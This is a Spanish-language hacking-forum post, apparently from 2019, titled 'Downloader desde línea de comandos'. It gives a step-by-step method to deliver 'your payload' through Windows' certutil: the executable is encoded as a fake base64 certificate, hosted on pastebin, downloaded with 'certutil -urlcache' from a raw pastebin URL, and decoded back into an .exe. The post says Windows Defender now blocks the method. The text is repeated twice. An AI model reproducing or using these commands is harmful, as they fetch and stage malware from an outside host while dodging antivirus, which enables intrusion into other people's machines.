Downloader desde línea de comandos
Publicado: 10 Ago 2019, 12:01
Hola, hace poco un usuario del servidor de Discord del foro ([Enlace externo eliminado para invitados], os invito a uniros) pidió ayuda sobre un downloader a través de FTP y recordé que hace poco salió un método nuevo para descargar archivos usando herramientas nativas de windows. Conocí esta técnica mediante [Enlace externo eliminado para invitados] pero parece ser que se está usando desde hace más tiempo.
El funcionamiento es sencillo, con el siguiente comando se codificará el archivo a base64 como si fuera un certificado:
payload.exe es el archivo de entrada (vuestro payload) y payload.enc es el archivo de salida.
Una vez codificado el archivo, hay que abrirlo con vuestro editor de textos favorito (menos el bloc de notas de Windows, por favor...), copiar el contenido y alojarlo en cualquier servicio para compartir textos, yo usaré pastebin, ya que permite compartir el archivo en texto plano (raw). Una vez subido el archivo a pastebin o cualquier otro servicio, copiad el enlace al archivo plano ([Enlace externo eliminado para invitados] en mi caso) y usando los siguientes comandos se descargará:
payload.download es el archivo descargado en forma de certificado codificado en base64.
Para decodificar este archivo, hay que usar el siguiente comando:
payload.download es el nombre del archivo que habéis puesto en el comando anterior y payload_dl.exe es el nombre final del archivo descargado (vuestro payload).
Si todo se ha ejecutado correctamente, los archivos payload.exe y payload_dl.exe deberían ser idénticos.
Os dejo un enlace a los archivos usados: [Enlace externo eliminado para invitados]
NOTA
Parece ser que Windows Defender se ha actualizado para detener este método
El funcionamiento es sencillo, con el siguiente comando se codificará el archivo a base64 como si fuera un certificado:
Código: Seleccionar todo
certutil.exe -f -encode payload.exe payload.enc
Una vez codificado el archivo, hay que abrirlo con vuestro editor de textos favorito (menos el bloc de notas de Windows, por favor...), copiar el contenido y alojarlo en cualquier servicio para compartir textos, yo usaré pastebin, ya que permite compartir el archivo en texto plano (raw). Una vez subido el archivo a pastebin o cualquier otro servicio, copiad el enlace al archivo plano ([Enlace externo eliminado para invitados] en mi caso) y usando los siguientes comandos se descargará:
Código: Seleccionar todo
certutil.exe -urlcache -split -f "https://pastebin.com/raw/VKZVUHBH" payload.download
Para decodificar este archivo, hay que usar el siguiente comando:
Código: Seleccionar todo
certutil.exe -decode payload.download payload_dl.exe
Si todo se ha ejecutado correctamente, los archivos payload.exe y payload_dl.exe deberían ser idénticos.
Os dejo un enlace a los archivos usados: [Enlace externo eliminado para invitados]
NOTA
Parece ser que Windows Defender se ha actualizado para detener este método